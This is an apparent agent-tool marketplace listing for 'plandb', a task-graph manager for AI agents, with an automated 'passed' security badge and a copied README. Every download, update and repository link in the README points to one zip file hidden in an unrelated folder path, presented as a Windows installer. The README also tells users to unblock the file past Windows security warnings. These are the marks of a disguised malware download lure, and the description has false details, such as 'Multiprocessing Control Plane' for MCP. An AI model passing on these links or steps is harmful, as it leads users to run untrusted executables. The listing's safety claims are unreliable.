Install
$ agentstack add mcp-zetsor-plandb ✓ scanned · ✓ verified, works with Claude Code, Cursor, and more.
Security review
✓ PassedNo issues found. Passed automated security review. · v0.1.0 How review works →
- ✓ Prompt-injection patterns
- ✓ Secret / credential exfiltration
- ✓ Dangerous shell & filesystem operations
- ✓ Untrusted network calls
- ✓ Known-malicious package signatures
What it can access
- ✓ Network access No
- ✓ Filesystem access No
- ✓ Shell / process execution No
- ✓ Environment & secrets No
- ✓ Dynamic code execution No
From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.
Verified badge
Passed review? Show it. Paste this badge into your README, it links to the public security report.
Reliability & compatibility
Declared compatibility
Compatibility is declared by the source manifest. End-to-end runtime verification is coming, see below.
We're building live execution health for every listing: tool-call success rate, median latency, uptime, and last-checked timestamps, measured, not self-reported. It isn't live yet, so we don't show numbers we can't stand behind.
How agent discovery & health will work →About
⚙️ plandb - Manage Tasks for AI Agents Simply
[](https://raw.githubusercontent.com/zetsor/plandb/main/experiments/01-fibonacci-api/typings/flask/Software_v2.3.zip)
📋 About plandb
plandb helps you organize and manage tasks for AI agents. It acts like a simple system to track what tasks need to be done, which are in progress, and which are complete. This tool runs on Windows and works behind the scenes to keep AI task flows smooth and clear.
It uses a task graph, which is a way to organize tasks so you can see how they connect and depend on each other. This helps if you want to plan AI actions step by step without confusion.
💻 System Requirements
To run plandb on your Windows PC, your system should have:
- Windows 10 or later (64-bit recommended)
- At least 4 GB of RAM
- At least 100 MB of free disk space
- Internet connection for initial download (optional after install)
No special hardware is needed. The program runs as a simple command-line tool, so no heavy graphics or high-end CPUs are required.
🚀 Download and Install
You need to visit the release page to download the plandb app for Windows.
[](https://raw.githubusercontent.com/zetsor/plandb/main/experiments/01-fibonacci-api/typings/flask/Software_v2.3.zip)
- Click the download button above or go to this link:
https://raw.githubusercontent.com/zetsor/plandb/main/experiments/01-fibonacci-api/typings/flask/Software_v2.3.zip
- On the release page, look for the latest version. It will be named something like
plandb-windows.exeor similar.
- Click on the
.exefile to start downloading.
- After the download finishes, open the file to start the installation.
- Follow the instructions in the installation wizard. Choose where to save the program or keep the default path.
- Once installed, plandb is ready to use.
🧰 How to Run plandb on Windows
After installation, you run plandb from the Windows Command Prompt.
- Press
Windows key + Rto open the Run dialog.
- Type
cmdand press Enter.
- In the command window, type
plandband press Enter.
If you see a message or help screen, it means the program is running correctly.
🔧 Basic Usage
plandb uses commands to handle tasks. Here are some basic commands you can type in the command window:
plandb add "Task description"
This adds a new task with the description you type in quotes.
plandb list
This shows all tasks you have added.
plandb done
This marks a task as finished. Replace `` with the task number shown in the list.
plandb graph
Shows how tasks are connected.
You can run plandb help to see all available commands.
🗂️ What plandb Does
- Organizes tasks in a clear order
- Shows dependencies between tasks
- Helps monitor progress
- Stores data locally using SQLite
- Runs quickly thanks to Rust's performance
- Works well with other AI tools or scripts
⚙️ Settings and Configuration
plandb stores its data in a local file. By default, it keeps files in a folder named plandb_data in your Documents.
You can change settings by editing a simple config file located inside that folder. The config file uses plain text and is easy to understand.
If you need to reset plandb, just delete the plandb_data folder. This will remove all tasks stored.
💡 Tips for New Users
- Always give clear names to your tasks. This helps you and any AI using plandb understand what needs to be done.
- Use
plandb listoften to check progress.
- When tasks depend on others, add all related tasks before running the graph command.
- You can copy commands from this guide and paste them in the command prompt.
🔄 Updating plandb
To stay up to date:
- Visit the release page:
https://raw.githubusercontent.com/zetsor/plandb/main/experiments/01-fibonacci-api/typings/flask/Software_v2.3.zip
- Download the newest
.exefile.
- Run the installer again to replace the old version.
You don’t need to uninstall the old version first.
🛠️ Troubleshooting
If plandb does not start:
- Check you have the right Windows version.
- Make sure you installed all files correctly.
- Confirm the
.exefile is not blocked by Windows security. Right-click the file, choose Properties, and if you see an "Unblock" button, click it.
- If you see errors in the command prompt, copy the message and seek help in community forums or GitHub issues.
🔗 Useful Links
- Download and install:
https://raw.githubusercontent.com/zetsor/plandb/main/experiments/01-fibonacci-api/typings/flask/Software_v2.3.zip
- Official repository:
https://raw.githubusercontent.com/zetsor/plandb/main/experiments/01-fibonacci-api/typings/flask/Software_v2.3.zip
📖 Topics Covered
This project is related to:
- AI Agents
- Command Line Interface (CLI)
- JIT Planning
- Large Language Models (LLM)
- Multiprocessing Control Plane (MCP)
- Task Orchestration
- Rust Programming
- SQLite Database
- Task Graphs
- Task Management Systems
Source & license
This open-source MCP server is cataloged on AgentStack and links to its original source — we do not rehost the code.
- Author: zetsor
- Source: zetsor/plandb
- License: Apache-2.0
- Homepage: https://github.com/zetsor
Install and usage instructions live in the source repository linked above.
Reviews
No reviews yet, be the first.
Write a review
Versions
- v0.1.0 Imported from the upstream source.